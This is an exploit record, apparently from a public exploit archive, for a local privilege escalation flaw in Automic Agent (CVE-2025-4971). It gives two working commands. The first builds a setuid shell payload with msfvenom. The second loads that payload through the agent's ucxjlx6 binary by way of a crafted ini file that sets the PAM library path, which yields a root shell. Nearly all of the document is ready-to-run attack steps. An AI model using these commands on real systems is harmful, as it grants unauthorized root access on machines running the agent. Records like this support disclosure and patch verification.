# Exploit Title: Automic Agent 24.3.0 HF4 - Privilege Escalation
# Date: 26.05.2025
# Exploit Author: Flora Schäfer
# Vendor Homepage: https://www.broadcom.com/products/software/automation/automic-automation
# Version: <24.3.0 HF4, <21.0.13 HF1
# Tested on: Linux
# CVE : CVE-2025-4971

1. Generate shared object file using msfvenom
$ msfvenom -p linux/x64/exec PrependSetuid=True PrependSetguid=True CMD="/bin/sh" -f elf-so > /tmp/sh.so

2. Run the ucxjlx6 executable as follows
$ ./ucxjlx6 ini=<(echo -e "[GLOBAL]\nhelplib = /dev/null\nsystem = blep\n[MISC]\nauthentication = PAM\n[PAM]\nlibName = /tmp/sh.so\n[VARIABLES]\nUC_EX_JOB_MD=blep")